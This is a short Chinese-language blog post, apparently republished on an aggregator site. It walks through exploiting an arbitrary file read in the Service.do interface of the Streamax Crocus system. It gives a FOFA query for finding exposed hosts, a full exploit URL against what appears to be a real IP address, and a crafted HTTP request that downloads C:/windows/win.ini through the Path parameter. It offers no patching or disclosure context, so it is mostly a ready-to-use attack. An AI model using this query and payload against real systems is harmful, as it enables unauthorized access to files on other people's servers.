当前位置: 首页 > news >正文

漏洞挖掘---锐明Crocus系统Service.do接口任意文件读取

news 来源:原创 2025/6/16 21:46:48

        一、FOFA-Search...

body="inp_verification"

        二、访问并抓包

#URL
http://110.52.91.154:8000/Service.do?Action=Download&Path=C:/windows/win.ini

        三、发送到重放器构造

#构造
GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1
Host: ******
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

                                                                                                                       FROM  IYU_ 

相关文章:

  • 《数字图像处理》第三章 3.8 基于模糊技术的图像强度变换与空间滤波学习笔记
  • 微积分小白入门:第二章 数列与极限——从困惑到顿悟的奇妙之旅
  • Vue 3中的Provide与Inject
  • stm32f103c8t6使用pwm(DMA)驱动24个ws2812b灯驱动
  • 【探寻C++之旅】第十章:map和set(STL续)
  • 看 MySQL InnoDB 和 BoltDB 的事务实现
  • 3.Excel:快速分析
  • 深入理解现代C++在IT行业中的核心地位与应用实践
  • 在 Windows 上安装 PowerShell 的多种方法与完整指南
  • 【设计模式】策略模式(Strategy Pattern)详解
  • 群体智能优化算法-沙丁鱼群优化算法(Salp Swarm Algorithm (SSA,含Matlab源代码)
  • C# Modbus TCP/IP学习记录
  • 【Unity网络编程知识】使用Socket实现简单UDP通讯
  • 算法 之 矩阵的对角线问题
  • Spring AI Alibaba 工具(Function Calling)使用
  • 2025.3.25总结
  • Java动态代理的使用和安全问题
  • WPS二次开发系列:以自动播放模式打开PPT文档
  • 【第五章】作业
  • MYSQL运维常用SQL
  • 佛山外贸网站制作/今晚比赛预测比分
  • 做家乡的网站/搜索引擎优化指南
  • 阿里云网站如何做淘宝客/如何推广网站方法
  • 哪个网站可以做微信头图/推广方案如何写
  • 自己做网站哪里最好/营口seo
  • 新网站建设总结/南宁网站seo